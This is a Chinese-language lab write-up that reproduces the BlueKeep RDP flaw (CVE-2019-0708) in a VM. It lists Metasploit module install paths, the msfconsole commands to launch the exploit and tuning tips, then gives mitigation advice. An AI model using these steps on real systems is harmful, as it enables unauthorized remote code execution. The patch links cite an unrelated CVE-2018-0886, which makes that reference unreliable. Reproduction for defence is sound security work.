0X01 簡介
Microsoft Windows是美國微軟公司發布的視窗操作系統。遠程桌面連接是微軟從Windows 2000 Server開始提供的功能組件。2019年5月14日,微軟發布了月度安全更新補丁,修復了遠程桌面協議(RDP)遠程代碼執行漏洞。未經身份驗證的攻擊者利用該漏洞,向目標 Windows主機發送惡意構造請求,可以在目標系統上執行任意代碼。近日,Metasploit發布了該漏洞的利用模塊,GitHub網站上也公開了該漏洞的利用代碼,引起了安全研究人員的廣泛關注。目前該漏洞利用僅對Windows 7 SP1 x64與Windows 2008 R2 x64(非系統默認配置)系統版本有效,在虛擬機環境下復現成功。
0x02 漏洞復現
下載利用腳本,放在對應的目錄,進入msf后需reload_all重新加載模塊。
rdp.rb ->
/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb ->
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb ->
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb ->
/usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
攻擊:
Msfconsole進入metasploit
輸入reload_all,重新載入所有的模塊。
search cve_2019_0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.88.141
set target 3 (3代表目標機器架構為VMware、2代表目標架構是virtulbox,由於目前該利用腳本未添加目標識別功能,因此需要手動設置目標類型)
exploit 開始攻擊
9月7日使用win7專業版復現失敗!
看到有人說virtubox可以復現,於是安裝virtubox,安裝新的win7系統進行測試,發現還是不行。參考如下鏈接:
目前針對該漏洞利用模塊還不是很穩定有很多人都是復現失敗,只有少數可以復現成功
9月9日復現
將專業版升級到旗艦版
復現成功,反復幾次,很穩定。
注意事項
1.使用
win7 x64 旗艦版 sp1,目前感覺win7旗艦版是最穩定的
2. windows版本 為 6.1.7601,目前該利用模塊只針對該版本有效
3.vmware設置2個內核、2G內存(涉及到內存機制)
0X03 修復建議
目前微軟已經發布了漏洞補丁,建議用戶立即進行相關升級:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-0886
https://support.microsoft.com/en-us/help/4093492/credssp-updates-for-cve-2018-0886-march-13-2018
臨時解決方案:
1.若用戶不需要用到遠程桌面服務,建議禁用該服務。
2.開啟網絡級別身份驗證(NLA)
3.關閉TCP端口3389的連接,或對相關服務器做訪問來源過濾,只允許可信IP連接。
0x04 參考鏈接